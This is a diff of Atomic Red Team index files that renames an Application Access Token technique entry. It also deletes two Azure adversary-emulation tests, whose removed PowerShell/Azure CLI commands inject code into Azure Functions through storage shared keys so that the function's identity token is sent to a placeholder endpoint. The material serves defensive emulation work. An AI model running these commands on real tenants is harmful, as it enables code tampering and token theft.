 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Software Deployment Tools](../../T1072/T1072.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | [Video Capture](../../T1125/T1125.md) |  | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
@@ -39,7 +39,7 @@
 |  | Hypervisor CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Cloud Administration Command](../../T1651/T1651.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [System Location Discovery](../../T1614/T1614.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | [Serverless Execution](../../T1648/T1648.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Modify Registry](../../T1112/T1112.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -195,7 +195,7 @@
 |  |  |  |  | [XSL Script Processing](../../T1220/T1220.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Modify Cloud Compute Infrastructure: Create Snapshot](../../T1578.001/T1578.001.md) |  |  |  |  |  |  |  |
-|  |  |  |  | [Use Alternate Authentication Material: Application Access Token](../../T1550.001/T1550.001.md) |  |  |  |  |  |  |  |
+|  |  |  |  | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) |  |  |  |  |  |  |  |
@@ -14300,7 +14300,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14377,7 +14377,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -45531,7 +45530,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -45608,7 +45607,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48966,6 +48964,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14275,7 +14275,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14352,7 +14352,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44851,7 +44850,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44928,7 +44927,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48052,6 +48050,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14204,7 +14204,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14281,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44252,7 +44251,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44329,7 +44328,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -47453,6 +47451,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14204,7 +14204,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14281,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44426,7 +44425,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44503,7 +44502,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -47627,6 +47625,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14204,7 +14204,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14281,7 +14281,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -44252,7 +44251,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -44329,7 +44328,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -47453,6 +47451,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14629,7 +14629,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14706,7 +14706,6 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
  T1078.004:
    technique:
@@ -45015,7 +45014,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -45092,7 +45091,6 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
    atomic_tests: []
 credential-access:
  T1557:
@@ -48316,6 +48314,7 @@ credential-access:
      x_mitre_data_sources:
      - 'Active Directory: Active Directory Object Modification'
      - 'User Account: User Account Modification'
+      identifier: T1528
    atomic_tests: []
  T1552.006:
    technique:
@@ -14340,7 +14340,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -14417,223 +14417,7 @@ defense-evasion:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
-        is expected to contain the tampered function presented in src/code_to_insert.py.
-        Note that the endpoint https://changeme.net needs to be adapted in your packed
-        function code.\n\nNote:\n- The Azure Function modified in this test must be
-        hosted via Azure Blob storage (Info on storage considerations for Azure Function:
-        https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
-        \n- For Function code upload to Azure Functions that are hosted via Azure
-        Files in a File Share, refer to T1550.001 \"Azure - Functions code upload
-        - Functions code injection to retrieve the Functions identity access token\".\n-
-        The required input fields can be retrieved in a reconnaissance step in test
-        T1619 \"Azure - Enumerate Storage Account Objects via Key-based authentication
-        using Azure CLI\". The code of function apps may be inspected and prepared
-        from the result of test T1530 \"Azure - Dump Azure Storage Account Objects
-        via Azure CLI\".\n\nRequirements:\n- The test is intended to be executed in
-        interactive mode (with -Interactive parameter) in order to complete the az
-        login command when MFA is required.\n- The EntraID user must have the role
-        \"Storage Account Contributor\", or a role with similar permissions."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        container_name:
-          type: string
-          default: container_name_example
-          description: Name of the container that contains the function blob
-        blob_name:
-          type: string
-          default: blob_example
-          description: Name of the function blob
-        file_path_blob:
-          type: path
-          default: "$env:temp/T1550.001_function_code.zip"
-          description: Path to the function code file to upload as blob
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {    \n    $connectionString = az storage account
-          show-connection-string --name \"#{storage_account_name}\" --query connectionString
-          --output tsv\n\n    # Download blob for cleanup\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + \"#{blob_name}\")\n
-          \   az storage blob download --connection-string $connectionString --container-name
-          \"#{container_name}\" --name \"#{blob_name}\" --file $tmpOriginalFunctionCode
-          --overwrite true\n\n    if ($LASTEXITCODE -eq 0) {\n        # Upload new
-          blob version if download of existing blob succeeded\n        az storage
-          blob upload --connection-string $connectionString --container-name \"#{container_name}\"
-          --name \"#{blob_name}\" --file \"#{file_path_blob}\" --overwrite true\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}\n"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + "#{blob_name}")
-          az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original blob file if upload succeeded
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
-    - name: Azure - Functions code upload - Functions code injection via File Share
-        modification to retrieve the Functions identity access token
-      auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
-      description: "This test injects code into an Azure Function (RCE) to perform
-        Subscription Privilege Escalation by retrieving the identity access token
-        of an Azure functions instance.\n\nAttack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nOnce
-        executed, the \"https://changeme\" will retrieve the access token when the
-        function app is executed on behalf of the tenant. The function may be triggered
-        manually from authorized people, triggered in regular intervals, or in various
-        other ways. The access token can then be used to perform further attack steps
-        with the permissions that the function app holds (e.g. listening virtual machines).\n\nNote:
-        \n- The Azure Function modified in this test must be hosted via Azure Files
-        in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).\n-
-        For Function code upload to Azure Functions that are hosted via Azure Blob
-        storage, refer to T1550.001 \"Azure - Functions code upload - Functions code
-        injection via Blob upload\".\n- The required input fields can be retrieved
-        in a reconnaissance step in test T1619 \"Azure - Enumerate Storage Account
-        Objects via Key-based authentication using Azure CLI\". The code of function
-        apps may be inspected and prepared from the result of test T1530 \"Azure -
-        Dump Azure Storage Account Objects via Azure CLI\".\n- Important: Change the
-        https://changeme.net in code_to_insert_path to a self-controlled endpoint.
-        This endpoint can be hosted e.g. as request bin via Pipedream to display the
-        body of incoming POST requests.\n- The default injected code to retrieve the
-        access token can be replaced by arbitrary other code. In this case: Replace
-        the code defined in code_to_insert_path\n\nRequirements:\n- The test is intended
-        to be executed in interactive mode (with -Interactive parameter) in order
-        to complete the az login command when MFA is required.\n- The EntraID user
-        must have the role \"Storage Account Contributor\", or a role with similar
-        permissions.\n\nExecution options: Defined by the input field execution_option\n-
-        insert_code: This option (1) downloads the existing funciton code into a tmp
-        file, (2) injects the code from code_to_insert_path at the beginning of the
-        file, and (3) uploads the tampered file to the targeted Azure Function code
-        (Azure File Share File).\n- replace_file: This option uploads the function
-        code defined in code_to_insert_path to the targeted Azure Function code (Azure
-        File Share File)."
-      supported_platforms:
-      - iaas:azure
-      input_arguments:
-        storage_account_name:
-          type: string
-          default: storage_account_name_example
-          description: Name of storage account that is related to the Function
-        execution_option:
-          type: string
-          default: insert_code
-          description: Chooses execution option insert_code, or replace_file
-        file_share_name:
-          type: string
-          default: file_share_name_example
-          description: Name of the file share that is related to the Function
-        file_path:
-          type: path
-          default: site/wwwroot/function_app.py
-          description: Path to the Function file in the file share
-        code_to_insert_path:
-          type: path
-          default: "$PathToAtomicsFolder/T1550.001/src/code_to_insert.py"
-          description: The code that will be injected into the Function
-      dependency_executor_name: powershell
-      dependencies:
-      - description: Azure CLI must be installed
-        prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
-          {exit 0} else {exit 1}} catch {exit 1}
-        get_prereq_command: Install-Module -Name Az -Force
-      executor:
-        command: "az login    # Log in to Azure CLI\n\n$allowSharedKeyAccess = az
-          storage account show --name \"#{storage_account_name}\" --query \"allowSharedKeyAccess\"\n\nif
-          ($allowSharedKeyAccess -eq \"false\") {    # $allowSharedKeyAccess could
-          be true or null\n    Write-Output \"Shared key access is disabled for this
-          storage account.\"\n} else {\n    # Download file for cleanup\n    $tmpOriginalFileName
-          = [System.IO.Path]::GetFileName(\"#{file_path}\")\n    $tmpOriginalFunctionCode
-          = Join-Path $env:temp/ (\"T1550.001_tmp_original_\" + $tmpOriginalFileName)\n
-          \   az storage file download --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors
-          --dest $tmpOriginalFunctionCode\n\n    if ($LASTEXITCODE -eq 0) {\n        #
-          Upload new funciton code if download of existing code succeeded\n        if
-          (\"#{execution_option}\" -eq \"insert_code\") {\n            # Download
-          file from file share for injection\n            $tmpFunctionCode = Join-Path
-          $env:temp/ (\"T1550.001_tmp_to_inject_\" + $tmpOriginalFileName)\n            az
-          storage file download --account-name \"#{storage_account_name}\" --share-name
-          \"#{file_share_name}\" -p \"#{file_path}\" --only-show-errors --dest $tmpFunctionCode\n
-          \           \n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code download failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"File downloaded: $($tmpFunctionCode)\"\n            \n
-          \           $insertContent = Get-Content -Path \"#{code_to_insert_path}\"
-          -Raw  # Load the content of the insert file\n            \n            $content
-          = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file\n            $content
-          = $insertContent + \"`n\" + $content     # Insert the new code at the beginning\n
-          \           $content | Set-Content -Path $tmpFunctionCode       # Write
-          the modified content to the file\n            \n            # Upload file
-          to file share\n            az storage file upload --account-name \"#{storage_account_name}\"
-          --share-name \"#{file_share_name}\" -p \"#{file_path}\" --source $tmpFunctionCode
-          --only-show-errors\n            if ($LASTEXITCODE -ne 0) {\n                Write-Output
-          \"Function code upload failed.\"\n                exit 1\n            }\n
-          \           Write-Output \"Uploaded the tampered file\"\n        } elseif
-          (\"#{execution_option}\" -eq \"replace_file\") {\n            az storage
-          file upload --account-name \"#{storage_account_name}\" --share-name \"#{file_share_name}\"
-          -p \"#{file_path}\" --source \"#{code_to_insert_path}\" --only-show-errors\n
-          \           if ($LASTEXITCODE -ne 0) {\n                Write-Output \"Function
-          code upload failed.\"\n                exit 1\n            }\n            Write-Output
-          \"Uploaded the tampered file\"\n        } else {\n            Write-Output
-          \"Please choose a valid execution_option\"\n            exit 1\n        }\n
-          \   } else {\n        Write-Output \"Download original function code failed.\"\n
-          \       exit 1\n    }\n}"
-        cleanup_command: |-
-          az login    # Log in to Azure CLI
-
-          # Upload previous funciton code
-          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
-          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_original_" + $tmpOriginalFileName)
-          az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
-
-          if ($LASTEXITCODE -eq 0) {
-              Write-Output "Uploaded original version of function code."
-
-              # Delete tmp original f file if upload succeeded
-              if ("#{execution_option}" -eq "insert_code") {
-                  $tmpFunctionCode = Join-Path $env:temp/ ("T1550.001_tmp_to_inject_" + $tmpOriginalFileName)
-                  Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
-                  Write-Output "Deleted tmp file: $($tmpFunctionCode)"
-              }
-
-              # Delete tmp original file
-              Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
-              Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
-          } else {
-              Write-Output "Upload original function code failed."
-          }
-        name: powershell
-        elevation_required: false
+    atomic_tests: []
  T1078.004:
    technique:
      type: attack-pattern
@@ -45247,7 +45031,7 @@ lateral-movement:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T19:59:20.277Z'
-      name: 'Use Alternate Authentication Material: Application Access Token'
+      name: Application Access Token
      description: "Adversaries may use stolen application access tokens to bypass
        the typical authentication process and access restricted accounts, information,
        or services on remote systems. These tokens are typically stolen from users
@@ -45324,223 +45108,7 @@ lateral-movement:
      x_mitre_version: '1.8'
      x_mitre_data_sources:
      - 'Web Credential: Web Credential Usage'
-      identifier: T1550.001
-    atomic_tests:
-    - name: Azure - Functions code upload - Functions code injection via Blob upload
-      auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
-      description: "This test injects code into an Azure Function (RCE).\n\nAttack
-        idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/\n\nSimilar
-        to T1550.001 \"Azure - Functions code upload - Functions code injection to
-        retrieve the Functions identity access token\", the depicted code injection
-        scenario tampers the source code of Azure Functions to perform Subscription
-        Privilege Escalation by retrieving the identity access token of an Azure functions
-        instance. In this case, the prepared zip file (underlying package for a Function)
